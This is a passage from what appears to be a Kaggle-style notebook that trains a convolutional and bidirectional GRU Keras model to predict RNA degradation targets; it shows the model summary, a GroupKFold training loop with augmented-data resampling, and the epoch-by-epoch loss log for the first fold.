= L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_loop) conv_bpps_max = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_max) conv_bpps_sum = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_sum) conv_bpps_scaled = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_scaled) x_concat = L.concatenate([conv_seq, conv_struct, conv_loop, conv_bpps_max, conv_bpps_sum, conv_bpps_scaled], axis=-1, name='conv_concatenate') # Recurrent block encoder, encoder_state_f, encoder_state_b = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, 
return_sequences=True, return_state=True, kernel_initializer='orthogonal'), name='Encoder_RNN')(x_concat) ### Decoder block decoder = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True, kernel_initializer='orthogonal'), name='Decoder')(encoder, initial_state=[encoder_state_f, encoder_state_b]) # Since we are only making predictions on the first part of each sequence, we have to truncate it decoder_truncated = decoder[:, :pred_len] output_react = L.Dense(1, name='output_react')(decoder_truncated) output_bg_ph = L.Dense(1, name='output_bg_ph')(decoder_truncated) output_ph = L.Dense(1, name='output_ph')(decoder_truncated) output_mg_c = L.Dense(1, name='output_mg_c')(decoder_truncated) output_c = L.Dense(1, name='output_c')(decoder_truncated) model = Model(inputs=[inputs_seq, inputs_struct, inputs_loop, inputs_bpps_max, inputs_bpps_sum, inputs_bpps_scaled], outputs=[output_react, output_bg_ph, output_ph, output_mg_c, output_c]) opt = optimizers.Adam(learning_rate=config['LEARNING_RATE']) model.compile(optimizer=opt, loss={'output_react': MCRMSE, 'output_bg_ph': MCRMSE, 'output_ph': MCRMSE, 'output_mg_c': MCRMSE, 'output_c': MCRMSE}, loss_weights={'output_react': 2., 'output_bg_ph': 2., 'output_ph': 1., 'output_mg_c': 2., 'output_c': 1.}) return model model = model_fn() model.summary() ###Output Model: "functional_1" __________________________________________________________________________________________________ Layer (type) Output Shape Param # Connected to ================================================================================================== inputs_seq (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_struct (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_loop (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ lambda (Lambda) (None, None, 4) 0 inputs_seq[0][0] __________________________________________________________________________________________________ lambda_1 (Lambda) (None, None, 3) 0 inputs_struct[0][0] __________________________________________________________________________________________________ lambda_2 (Lambda) (None, None, 7) 0 inputs_loop[0][0] __________________________________________________________________________________________________ inputs_bpps_max (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_bpps_sum (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ inputs_bpps_scaled (InputLayer) [(None, None, 1)] 0 __________________________________________________________________________________________________ conv1d (Conv1D) (None, None, 64) 832 lambda[0][0] __________________________________________________________________________________________________ conv1d_1 (Conv1D) (None, None, 64) 640 lambda_1[0][0] __________________________________________________________________________________________________ conv1d_2 (Conv1D) (None, None, 64) 1408 lambda_2[0][0] __________________________________________________________________________________________________ conv1d_3 (Conv1D) (None, None, 64) 256 inputs_bpps_max[0][0] __________________________________________________________________________________________________ 
conv1d_4 (Conv1D) (None, None, 64) 256 inputs_bpps_sum[0][0] __________________________________________________________________________________________________ conv1d_5 (Conv1D) (None, None, 64) 256 inputs_bpps_scaled[0][0] __________________________________________________________________________________________________ conv_concatenate (Concatenate) (None, None, 384) 0 conv1d[0][0] conv1d_1[0][0] conv1d_2[0][0] conv1d_3[0][0] conv1d_4[0][0] conv1d_5[0][0] __________________________________________________________________________________________________ Encoder_RNN (Bidirectional) [(None, None, 768), 1774080 conv_concatenate[0][0] __________________________________________________________________________________________________ Decoder (Bidirectional) (None, None, 768) 2658816 Encoder_RNN[0][0] Encoder_RNN[0][1] Encoder_RNN[0][2] __________________________________________________________________________________________________ tf_op_layer_strided_slice (Tens [(None, None, 768)] 0 Decoder[0][0] __________________________________________________________________________________________________ output_react (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_bg_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_mg_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] __________________________________________________________________________________________________ output_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0] ================================================================================================== Total params: 4,440,389 Trainable params: 4,440,389 Non-trainable params: 0 __________________________________________________________________________________________________ ###Markdown Training ###Code AUTO = tf.data.experimental.AUTOTUNE skf = GroupKFold(n_splits=config['N_FOLDS']) history_list = [] oof = train[['id', 'SN_filter', 'signal_to_noise'] + pred_cols].copy() oof_preds = np.zeros((len(train), 68, len(pred_cols))) test_public_preds = np.zeros((len(public_test), config['PB_SEQ_LEN'], len(pred_cols))) test_private_preds = np.zeros((len(private_test), config['PV_SEQ_LEN'], len(pred_cols))) for fold,(train_idx, valid_idx) in enumerate(skf.split(train, train['signal_to_noise_int'], train['id'])): if fold >= config['N_USED_FOLDS']: break print(f'\nFOLD: {fold+1}') # Create clean and noisy datasets valid_clean_idxs = np.intersect1d(train[(train['SN_filter'] == 1) & (train['augmented'] == False)].index, valid_idx) ### Create datasets # x_train = get_features_dict(train, feature_cols, encoder_list, train_idx) # y_train = get_targets_dict(train, pred_cols, train_idx) # w_train = np.log(train.iloc[train_idx]['signal_to_noise'].values+1.2)+1 x_valid = get_features_dict(train, feature_cols, encoder_list, valid_clean_idxs) y_valid = get_targets_dict(train, pred_cols, valid_clean_idxs) w_valid = np.log(train.iloc[valid_clean_idxs]['signal_to_noise'].values+1.2)+1 # train_ds = get_dataset(x_train, y_train, w_train, labeled=True, shuffled=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) valid_ds = get_dataset(x_valid, y_valid, w_valid, labeled=True, 
shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) oof_ds = get_dataset(get_features_dict(train, feature_cols, encoder_list, valid_idx), labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) test_public_ds = get_dataset(x_test_public, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) test_private_ds = get_dataset(x_test_private, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) # Create clean and noisy datasets normal_idxs = np.intersect1d(train[train['augmented'] == False].index, train_idx) x_train_normal = get_features_dict(train, feature_cols, encoder_list, normal_idxs) y_train_normal = get_targets_dict(train, pred_cols, normal_idxs) w_train_normal = np.log(train.iloc[normal_idxs]['signal_to_noise'].values+1.2)+1 normal_ds = get_dataset_sampling(x_train_normal, y_train_normal, w_train_normal, labeled=True, shuffled=True, repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) augmented_idxs = np.intersect1d(train[train['augmented'] == True].index, train_idx) x_train_augmented = get_features_dict(train, feature_cols, encoder_list, augmented_idxs) y_train_augmented = get_targets_dict(train, pred_cols, augmented_idxs) w_train_augmented = np.log(train.iloc[augmented_idxs]['signal_to_noise'].values+1.2)+1 augmented_ds = get_dataset_sampling(x_train_augmented, y_train_augmented, w_train_augmented, labeled=True, shuffled=True, repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED) # Resampled TF Dataset resampled_ds = tf.data.experimental.sample_from_datasets([normal_ds, augmented_ds], weights=[.5, .5]) resampled_ds = resampled_ds.batch(config['BATCH_SIZE']).prefetch(AUTO) ### Model K.clear_session() model = model_fn() model_path = f'model_{fold}.h5' es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'], restore_best_weights=True, verbose=1) rlrp = ReduceLROnPlateau(monitor='val_loss', mode='min', factor=0.1, patience=5, verbose=1) ### Train history = model.fit(resampled_ds, validation_data=valid_ds, callbacks=[es, rlrp], epochs=config['EPOCHS'], batch_size=config['BATCH_SIZE'], steps_per_epoch=int(len(normal_idxs)//(config['BATCH_SIZE']* .5)), verbose=2).history history_list.append(history) # Save last model weights model.save_weights(model_path) ### Inference oof_ds_preds = np.array(model.predict(oof_ds)).reshape((len(pred_cols), len(valid_idx), 68)).transpose((1, 2, 0)) oof_preds[valid_idx] = oof_ds_preds # Short sequence (public test) model = model_fn(pred_len=config['PB_SEQ_LEN']) model.load_weights(model_path) test_public_ds_preds = np.array(model.predict(test_public_ds)).reshape((len(pred_cols), len(public_test), config['PB_SEQ_LEN'])).transpose((1, 2, 0)) test_public_preds += test_public_ds_preds * (1 / config['N_USED_FOLDS']) # Long sequence (private test) model = model_fn(pred_len=config['PV_SEQ_LEN']) model.load_weights(model_path) test_private_ds_preds = np.array(model.predict(test_private_ds)).reshape((len(pred_cols), len(private_test), config['PV_SEQ_LEN'])).transpose((1, 2, 0)) test_private_preds += test_private_ds_preds * (1 / config['N_USED_FOLDS']) ###Output FOLD: 1 Epoch 1/70 120/120 - 9s - loss: 8.8397 - output_react_loss: 0.9259 - output_bg_ph_loss: 1.1574 - output_ph_loss: 1.3049 - output_mg_c_loss: 1.1250 - output_c_loss: 1.1182 - val_loss: 6.6835 - val_output_react_loss: 0.7664 - val_output_bg_ph_loss: 0.9430 - val_output_ph_loss: 0.8700 - 
val_output_mg_c_loss: 0.8241 - val_output_c_loss: 0.7464 Epoch 2/70 120/120 - 7s - loss: 7.6376 - output_react_loss: 0.8081 - output_bg_ph_loss: 0.9683 - output_ph_loss: 1.1501 - output_mg_c_loss: 0.9694 - output_c_loss: 0.9957 - val_loss: 6.0817 - val_output_react_loss: 0.6944 - val_output_bg_ph_loss: 0.8665 - val_output_ph_loss: 0.8055 - val_output_mg_c_loss: 0.7370 - val_output_c_loss: 0.6802 Epoch 3/70 120/120 - 7s - loss: 7.1648 - output_react_loss: 0.7737 - output_bg_ph_loss: 0.9002 - output_ph_loss: 1.1059 - output_mg_c_loss: 0.8889 - output_c_loss: 0.9332 - val_loss: 5.6689 - val_output_react_loss: 0.6572 - val_output_bg_ph_loss: 0.8071 - val_output_ph_loss: 0.7491 - val_output_mg_c_loss: 0.6815 - val_output_c_loss: 0.6283 Epoch 4/70 120/120 - 7s - loss: 6.6211 - output_react_loss: 0.7340 - output_bg_ph_loss: 0.8261 - output_ph_loss: 1.0016 - output_mg_c_loss: 0.8152 - output_c_loss: 0.8689 - val_loss: 5.4716 - val_output_react_loss: 0.6421 - val_output_bg_ph_loss: 0.7689 - val_output_ph_loss: 0.7378 - val_output_mg_c_loss: 0.6485 - val_output_c_loss: 0.6149 Epoch 5/70 120/120 - 7s - loss: 6.4536 - output_react_loss: 0.7158 - output_bg_ph_loss: 0.8024 - output_ph_loss: 0.9987 - output_mg_c_loss: 0.7880 - output_c_loss: 0.8425 - val_loss: 5.3014 - val_output_react_loss: 0.6178 - val_output_bg_ph_loss: 0.7454 - val_output_ph_loss: 0.7235 - val_output_mg_c_loss: 0.6300 - val_output_c_loss: 0.5915 Epoch 6/70 120/120 - 7s - loss: 6.1134 - output_react_loss: 0.6714 - output_bg_ph_loss: 0.7681 - output_ph_loss: 0.9380 - output_mg_c_loss: 0.7443 - output_c_loss: 0.8078 - val_loss: 5.1079 - val_output_react_loss: 0.5890 - val_output_bg_ph_loss: 0.7184 - val_output_ph_loss: 0.6878 - val_output_mg_c_loss: 0.6115 - val_output_c_loss: 0.5824 Epoch 7/70 120/120 - 7s - loss: 5.9865 - output_react_loss: 0.6653 - output_bg_ph_loss: 0.7482 - output_ph_loss: 0.9160 - output_mg_c_loss: 0.7237 - output_c_loss: 0.7961 - val_loss: 5.0390 - val_output_react_loss: 0.5902 - val_output_bg_ph_loss: 0.7151 - val_output_ph_loss: 0.6802 - val_output_mg_c_loss: 0.5866 - val_output_c_loss: 0.5750 Epoch 8/70 120/120 - 7s - loss: 5.8787 - output_react_loss: 0.6528 - output_bg_ph_loss: 0.7308 - output_ph_loss: 0.9134 - output_mg_c_loss: 0.7059 - output_c_loss: 0.7861 - val_loss: 4.9266 - val_output_react_loss: 0.5709 - val_output_bg_ph_loss: 0.7068 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5758 - val_output_c_loss: 0.5577 Epoch 9/70 120/120 - 7s - loss: 5.8656 - output_react_loss: 0.6562 - output_bg_ph_loss: 0.7181 - output_ph_loss: 0.9100 - output_mg_c_loss: 0.7022 - output_c_loss: 0.8025 - val_loss: 4.9422 - val_output_react_loss: 0.5764 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6640 - val_output_mg_c_loss: 0.5782 - val_output_c_loss: 0.5650 Epoch 10/70 120/120 - 7s - loss: 5.7170 - output_react_loss: 0.6373 - output_bg_ph_loss: 0.7020 - output_ph_loss: 0.8879 - output_mg_c_loss: 0.6831 - output_c_loss: 0.7843 - val_loss: 4.8992 - val_output_react_loss: 0.5714 - val_output_bg_ph_loss: 0.6902 - val_output_ph_loss: 0.6615 - val_output_mg_c_loss: 0.5746 - val_output_c_loss: 0.5652 Epoch 11/70 120/120 - 7s - loss: 5.3053 - output_react_loss: 0.5975 - output_bg_ph_loss: 0.6579 - output_ph_loss: 0.8233 - output_mg_c_loss: 0.6250 - output_c_loss: 0.7213 - val_loss: 4.8023 - val_output_react_loss: 0.5606 - val_output_bg_ph_loss: 0.6868 - val_output_ph_loss: 0.6482 - val_output_mg_c_loss: 0.5583 - val_output_c_loss: 0.5427 Epoch 12/70 120/120 - 7s - loss: 5.5135 - output_react_loss: 0.6187 - 
output_bg_ph_loss: 0.6695 - output_ph_loss: 0.8676 - output_mg_c_loss: 0.6550 - output_c_loss: 0.7598 - val_loss: 4.7526 - val_output_react_loss: 0.5582 - val_output_bg_ph_loss: 0.6705 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5555 - val_output_c_loss: 0.5471 Epoch 13/70 120/120 - 7s - loss: 5.2029 - output_react_loss: 0.5775 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8221 - output_mg_c_loss: 0.6133 - output_c_loss: 0.7198 - val_loss: 4.7717 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6807 - val_output_ph_loss: 0.6389 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5438 Epoch 14/70 120/120 - 7s - loss: 5.2533 - output_react_loss: 0.5847 - output_bg_ph_loss: 0.6349 - output_ph_loss: 0.8446 - output_mg_c_loss: 0.6162 - output_c_loss: 0.7371 - val_loss: 4.7730 - val_output_react_loss: 0.5559 - val_output_bg_ph_loss: 0.6747 - val_output_ph_loss: 0.6340 - val_output_mg_c_loss: 0.5644 - val_output_c_loss: 0.5489 Epoch 15/70 120/120 - 7s - loss: 5.0608 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6109 - output_ph_loss: 0.8029 - output_mg_c_loss: 0.5952 - output_c_loss: 0.7100 - val_loss: 4.7315 - val_output_react_loss: 0.5479 - val_output_bg_ph_loss: 0.6692 - val_output_ph_loss: 0.6356 - val_output_mg_c_loss: 0.5578 - val_output_c_loss: 0.5461 Epoch 16/70 120/120 - 7s - loss: 5.0519 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6056 - output_ph_loss: 0.8057 - output_mg_c_loss: 0.5897 - output_c_loss: 0.7197 - val_loss: 4.7195 - val_output_react_loss: 0.5459 - val_output_bg_ph_loss: 0.6713 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5420 Epoch 17/70 120/120 - 7s - loss: 4.9197 - output_react_loss: 0.5442 - output_bg_ph_loss: 0.5949 - output_ph_loss: 0.7841 - output_mg_c_loss: 0.5771 - output_c_loss: 0.7033 - val_loss: 4.7081 - val_output_react_loss: 0.5398 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6330 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5494 Epoch 18/70 120/120 - 7s - loss: 4.8407 - output_react_loss: 0.5387 - output_bg_ph_loss: 0.5863 - output_ph_loss: 0.7697 - output_mg_c_loss: 0.5651 - output_c_loss: 0.6909 - val_loss: 4.7479 - val_output_react_loss: 0.5473 - val_output_bg_ph_loss: 0.6786 - val_output_ph_loss: 0.6390 - val_output_mg_c_loss: 0.5585 - val_output_c_loss: 0.5402 Epoch 19/70 120/120 - 7s - loss: 4.9427 - output_react_loss: 0.5432 - output_bg_ph_loss: 0.5823 - output_ph_loss: 0.8134 - output_mg_c_loss: 0.5743 - output_c_loss: 0.7299 - val_loss: 4.6847 - val_output_react_loss: 0.5418 - val_output_bg_ph_loss: 0.6676 - val_output_ph_loss: 0.6277 - val_output_mg_c_loss: 0.5495 - val_output_c_loss: 0.5391 Epoch 20/70 120/120 - 7s - loss: 4.7518 - output_react_loss: 0.5295 - output_bg_ph_loss: 0.5623 - output_ph_loss: 0.7691 - output_mg_c_loss: 0.5556 - output_c_loss: 0.6880 - val_loss: 4.6505 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6606 - val_output_ph_loss: 0.6247 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5354 Epoch 21/70 120/120 - 7s - loss: 4.5799 - output_react_loss: 0.5129 - output_bg_ph_loss: 0.5427 - output_ph_loss: 0.7412 - output_mg_c_loss: 0.5302 - output_c_loss: 0.6670 - val_loss: 4.6555 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6600 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5457 - val_output_c_loss: 0.5435 Epoch 22/70 120/120 - 7s - loss: 4.6793 - output_react_loss: 0.5103 - output_bg_ph_loss: 0.5511 - output_ph_loss: 0.7675 - output_mg_c_loss: 0.5492 - output_c_loss: 0.6907 - val_loss: 4.6583 - 
val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6578 - val_output_ph_loss: 0.6263 - val_output_mg_c_loss: 0.5486 - val_output_c_loss: 0.5399 Epoch 23/70 120/120 - 7s - loss: 4.7231 - output_react_loss: 0.5174 - output_bg_ph_loss: 0.5518 - output_ph_loss: 0.7815 - output_mg_c_loss: 0.5493 - output_c_loss: 0.7045 - val_loss: 4.6738 - val_output_react_loss: 0.5383 - val_output_bg_ph_loss: 0.6693 - val_output_ph_loss: 0.6249 - val_output_mg_c_loss: 0.5477 - val_output_c_loss: 0.5383 Epoch 24/70 120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4920 - output_bg_ph_loss: 0.5392 - output_ph_loss: 0.7414 - output_mg_c_loss: 0.5234 - output_c_loss: 0.6726 - val_loss: 4.7325 - val_output_react_loss: 0.5448 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6377 - val_output_mg_c_loss: 0.5582 - val_output_c_loss: 0.5427 Epoch 25/70 Epoch 00025: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 120/120 - 7s - loss: 4.3904 - output_react_loss: 0.4821 - output_bg_ph_loss: 0.5178 - output_ph_loss: 0.7217 - output_mg_c_loss: 0.5074 - output_c_loss: 0.6540 - val_loss: 4.6522 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6223 - val_output_mg_c_loss: 0.5502 - val_output_c_loss: 0.5329 Epoch 26/70 120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5207 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5257 - output_c_loss: 0.6996 - val_loss: 4.5565 - val_output_react_loss: 0.5271 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5268 Epoch 27/70 120/120 - 7s - loss: 4.1334 - output_react_loss: 0.4538 - output_bg_ph_loss: 0.4856 - output_ph_loss: 0.6847 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6195 - val_loss: 4.5609 - val_output_react_loss: 0.5284 - val_output_bg_ph_loss: 0.6479 - val_output_ph_loss: 0.6152 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5270 Epoch 28/70 120/120 - 7s - loss: 4.2748 - output_react_loss: 0.4703 - output_bg_ph_loss: 0.4885 - output_ph_loss: 0.7147 - output_mg_c_loss: 0.4972 - output_c_loss: 0.6479 - val_loss: 4.5574 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6485 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5260 Epoch 29/70 120/120 - 7s - loss: 4.2394 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4884 - output_ph_loss: 0.7139 - output_mg_c_loss: 0.4878 - output_c_loss: 0.6537 - val_loss: 4.5584 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5334 - val_output_c_loss: 0.5274 Epoch 30/70 120/120 - 7s - loss: 4.2578 - output_react_loss: 0.4595 - output_bg_ph_loss: 0.4945 - output_ph_loss: 0.7195 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6493 - val_loss: 4.5614 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5275 Epoch 31/70 120/120 - 7s - loss: 4.3131 - output_react_loss: 0.4688 - output_bg_ph_loss: 0.4934 - output_ph_loss: 0.7268 - output_mg_c_loss: 0.4992 - output_c_loss: 0.6634 - val_loss: 4.5532 - val_output_react_loss: 0.5268 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5268 Epoch 32/70 120/120 - 7s - loss: 4.1724 - output_react_loss: 0.4482 - output_bg_ph_loss: 0.4822 - output_ph_loss: 0.7072 - output_mg_c_loss: 0.4776 - output_c_loss: 0.6491 - val_loss: 4.5556 - val_output_react_loss: 0.5283 - 
val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5266 Epoch 33/70 120/120 - 7s - loss: 4.0777 - output_react_loss: 0.4427 - output_bg_ph_loss: 0.4760 - output_ph_loss: 0.6814 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6219 - val_loss: 4.5641 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5273 Epoch 34/70 120/120 - 8s - loss: 4.2050 - output_react_loss: 0.4552 - output_bg_ph_loss: 0.4826 - output_ph_loss: 0.7076 - output_mg_c_loss: 0.4829 - output_c_loss: 0.6560 - val_loss: 4.5578 - val_output_react_loss: 0.5287 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5279 Epoch 35/70 120/120 - 7s - loss: 4.1196 - output_react_loss: 0.4479 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.6841 - output_mg_c_loss: 0.4790 - output_c_loss: 0.6326 - val_loss: 4.5642 - val_output_react_loss: 0.5291 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6141 - val_output_mg_c_loss: 0.5349 - val_output_c_loss: 0.5277 Epoch 36/70 Epoch 00036: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 4.1539 - output_react_loss: 0.4543 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.6984 - output_mg_c_loss: 0.4783 - output_c_loss: 0.6424 - val_loss: 4.5608 - val_output_react_loss: 0.5286 - val_output_bg_ph_loss: 0.6470 - val_output_ph_loss: 0.6157 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5269 Epoch 37/70 120/120 - 7s - loss: 4.2010 - output_react_loss: 0.4513 - output_bg_ph_loss: 0.4825 - output_ph_loss: 0.7171 - output_mg_c_loss: 0.4820 - output_c_loss: 0.6524 - val_loss: 4.5544 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6467 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5266 Epoch 38/70 120/120 - 7s - loss: 4.0893 - output_react_loss: 0.4433 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.6860 - output_mg_c_loss: 0.4737 - output_c_loss: 0.6247 - val_loss: 4.5552 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6466 - val_output_ph_loss: 0.6138 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5267 Epoch 39/70 120/120 - 7s - loss: 4.1813 - output_react_loss: 0.4526 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7089 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6541 - val_loss: 4.5544 - val_output_react_loss: 0.5272 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5268 Epoch 40/70 120/120 - 7s - loss: 4.0733 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4701 - output_ph_loss: 0.6839 - output_mg_c_loss: 0.4650 - output_c_loss: 0.6399 - val_loss: 4.5556 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5272 Epoch 41/70 120/120 - 7s - loss: 4.0894 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.6876 - output_mg_c_loss: 0.4709 - output_c_loss: 0.6341 - val_loss: 4.5525 - val_output_react_loss: 0.5274 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5269 Epoch 42/70 120/120 - 8s - loss: 4.1918 - output_react_loss: 0.4541 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.4842 - output_c_loss: 0.6530 - val_loss: 4.5551 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6466 - 
val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5271 Epoch 43/70 120/120 - 7s - loss: 4.2285 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4855 - output_ph_loss: 0.7191 - output_mg_c_loss: 0.4849 - output_c_loss: 0.6492 - val_loss: 4.5543 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5270 Epoch 44/70 120/120 - 7s - loss: 3.9389 - output_react_loss: 0.4208 - output_bg_ph_loss: 0.4606 - output_ph_loss: 0.6573 - output_mg_c_loss: 0.4551 - output_c_loss: 0.6086 - val_loss: 4.5547 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6469 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5269 Epoch 45/70 120/120 - 7s - loss: 4.1721 - output_react_loss: 0.4503 - output_bg_ph_loss: 0.4780 - output_ph_loss: 0.7018 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6468 - val_loss: 4.5578 - val_output_react_loss: 0.5282 - val_output_bg_ph_loss: 0.6471 - val_output_ph_loss: 0.6137 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5272 Epoch 46/70 Epoch 00046: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 7s - loss: 4.1766 - output_react_loss: 0.4501 - output_bg_ph_loss: 0.4758 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4777 - output_c_loss: 0.6573 - val_loss: 4.5556 - val_output_react_loss: 0.5279 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6135 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5269 Epoch 47/70 120/120 - 7s - loss: 4.1604 - output_react_loss: 0.4493 - output_bg_ph_loss: 0.4744 - output_ph_loss: 0.7118 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6509 - val_loss: 4.5541 - val_output_react_loss: 0.5278 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5268 Epoch 48/70 120/120 - 7s - loss: 4.1509 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4746 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4827 - output_c_loss: 0.6452 - val_loss: 4.5540 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6465 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269 Epoch 49/70 120/120 - 7s - loss: 4.1227 - output_react_loss: 0.4461 - output_bg_ph_loss: 0.4759 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4702 - output_c_loss: 0.6421 - val_loss: 4.5530 - val_output_react_loss: 0.5276 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5325 - val_output_c_loss: 0.5268 Epoch 50/70 120/120 - 7s - loss: 4.1497 - output_react_loss: 0.4514 - output_bg_ph_loss: 0.4761 - output_ph_loss: 0.6964 - output_mg_c_loss: 0.4794 - output_c_loss: 0.6394 - val_loss: 4.5538 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5269 Epoch 51/70 Restoring model weights from the end of the best epoch. Epoch 00051: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07. 
